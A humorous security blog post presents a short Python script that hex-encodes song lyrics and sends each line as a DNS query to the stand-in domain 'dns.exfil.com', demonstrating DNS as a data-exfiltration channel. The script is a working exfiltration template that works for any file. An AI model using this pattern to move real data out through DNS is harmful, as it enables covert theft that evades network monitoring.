DNS Rickroll – Trolling Sysadmins to Ring in the New Year!

I wanted to release something lighter around the holidays, so I present my DNS Rickroll python script!

As you know, DNS is for data exfiltration, tunneling, and general malfeasance. In the spirit of the holidays, I've decided to release a slightly different tool utilizing DNS.

DNS Rickroll takes a lyrics file (currently this), converts it to ASCII hex, and sends a DNS request to the specified domain.


To start, all the script needs is Python, dnspython, and a lyrics.txt file (included). Additionally, you can add a domain where you can verify results and a healthy sense of humor.

You can find the current code for DNSRickroll below.

import dns.resolver
import urllib

myResolver = dns.resolver.Resolver()
domain = "dns.exfil.com"

with open('lyrics.txt') as f:
    content = f.readlines()
    content = [x.strip() for x in content] 

for line in content:
    hex = ''.join("{:02x}".format(ord(c)) for c in line)
    #print hex
    #print len(hex)

    query = myResolver.query(hex + "." + domain, "A")


And here you can see the requests in action!

DNS Rickroll - Execution

While this tool is definitely for fun, I could also see it being used to double encode information in lyrics, etc. Alternatively, the script could arrange the order of lyrics as another form of obfuscation and encoding.


Some of my next steps will be to add more lyrics and automatically shorten the lines (I manually edited this lyrics file). Additionally, I may add support for a URL where it can verify its own results.

Finally, you can find the code and updates in my GitHub repository.

doyler on Githubdoyler on Twitter
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

As an Amazon Associate I earn from qualifying purchases.

Common passed on this blog, I made it to a jam.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

ERROR: si-captcha.php plugin: GD image support not detected in PHP!

Contact your web host and ask them to enable GD image support for PHP.

ERROR: si-captcha.php plugin: imagepng function not detected in PHP!

Contact your web host and ask them to enable imagepng for PHP.

This site uses Akismet to reduce spam. Learn how your comment data is processed.